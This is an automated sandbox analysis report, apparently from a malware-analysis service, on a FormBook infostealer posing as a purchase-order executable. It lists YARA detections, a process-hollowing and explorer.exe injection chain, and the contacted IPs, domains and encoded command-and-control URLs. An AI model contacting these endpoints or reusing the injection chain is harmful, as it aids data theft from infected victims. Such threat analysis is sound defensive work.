Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 0_2_013E7280
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 0_2_013E8AD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 0_2_013DECBB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 0_2_013E873D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 0_2_013E87E4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_013E8648
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 0_2_013E7EDC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013DC26F GetSystemTimeAsFileTime,__aulldiv, 0_2_013DC26F

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

Behavior Graph (ID: 321097, Sample: Purchase Order 40,7045$.exe, Startdate: 20/11/2020, Architecture: WINDOWS, Score: 100)

Process chain recovered from the graph: Purchase Order 40,7045$.exe starts a second instance of itself (Maps a DLL or memory area into another process). The second instance injects into explorer.exe (Modifies the context of a thread in another process, Maps a DLL or memory area into another process, Sample uses process hollowing technique, Queues an APC in another process). The injected explorer.exe connects to www.realitytvstockwatch.com (103.224.182.242, port 80, TRELLIAN-AS-AP, Australia), searchnehomes.com (34.102.136.180, port 80, GOOGLE, United States) and 22 other IPs or domains (System process connects to network), then starts ipconfig.exe. ipconfig.exe (Modifies the context of a thread in another process, Maps a DLL or memory area into another process, Tries to detect virtualization through RDTSC time measurements) starts cmd.exe, which starts conhost.exe. DNS names shown at the root of the graph: www.handsfreedocs.com, www.lotoencasa.com. Root-level signatures: Snort IDS alert for network traffic, Malicious sample detected (through community Yara rule), Antivirus / Scanner detection for submitted sample, and 7 other signatures.

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
52.58.78.16 unknown United States 16509 AMAZON-02US true
194.35.122.226 unknown Germany 35913 DEDIPATH-LLCUS true
185.201.11.126 unknown Germany 47583 AS-HOSTINGERLT true
3.134.22.63 unknown United States 16509 AMAZON-02US true
160.153.136.3 unknown United States 21501 GODADDY-AMSDE true
103.224.182.242 unknown Australia 133618 TRELLIAN-AS-APTrellianPtyLimitedAU true
104.253.79.71 unknown United States 18779 EGIHOSTINGUS true
52.71.133.130 unknown United States 14618 AMAZON-AESUS true
3.12.202.18 unknown United States 16509 AMAZON-02US false
35.246.6.109 unknown United States 15169 GOOGLEUS true
154.86.218.70 unknown Seychelles 134548 DXTL-HKDXTLTseungKwanOServiceHK true
34.102.136.180 unknown United States 15169 GOOGLEUS true
13.226.173.80 unknown United States 16509 AMAZON-02US true

Contacted Domains

Name IP Active
www.realitytvstockwatch.com 103.224.182.242 true
www.the-gongs.com 104.253.79.71 true
td-balancer-euw2-6-109.wixdns.net 35.246.6.109 true
sweetbasilmarketing.com 185.201.11.126 true
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 3.12.202.18 true
www.maninhatphoto.com 154.86.218.70 true
fahufu.com 194.35.122.226 true
www.justsoldbykristen.com 52.71.133.130 true
heartandcrowncloset.com 160.153.136.3 true
searchnehomes.com 34.102.136.180 true
www.lotoencasa.com 192.155.168.14 true
www.ariasu-nakanokaikei.com 13.226.173.80 true
www.hemparcade.com 52.58.78.16 true
www.searchnehomes.com unknown unknown
www.heartandcrowncloset.com unknown unknown
www.fahufu.com unknown unknown
www.placeduconfort.com unknown unknown
www.handsfreedocs.com unknown unknown
www.shopnicknaks.com unknown unknown
www.happinestbuilders.com unknown unknown
www.sweetbasilmarketing.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.the-gongs.com/igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.sweetbasilmarketing.com/igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.fahufu.com/igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.ariasu-nakanokaikei.com/igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.realitytvstockwatch.com/igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.hemparcade.com/igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.placeduconfort.com/igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.maninhatphoto.com/igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.happinestbuilders.com/igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.searchnehomes.com/igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.justsoldbykristen.com/igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown
http://www.shopnicknaks.com/igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr true Avira URL Cloud: safe unknown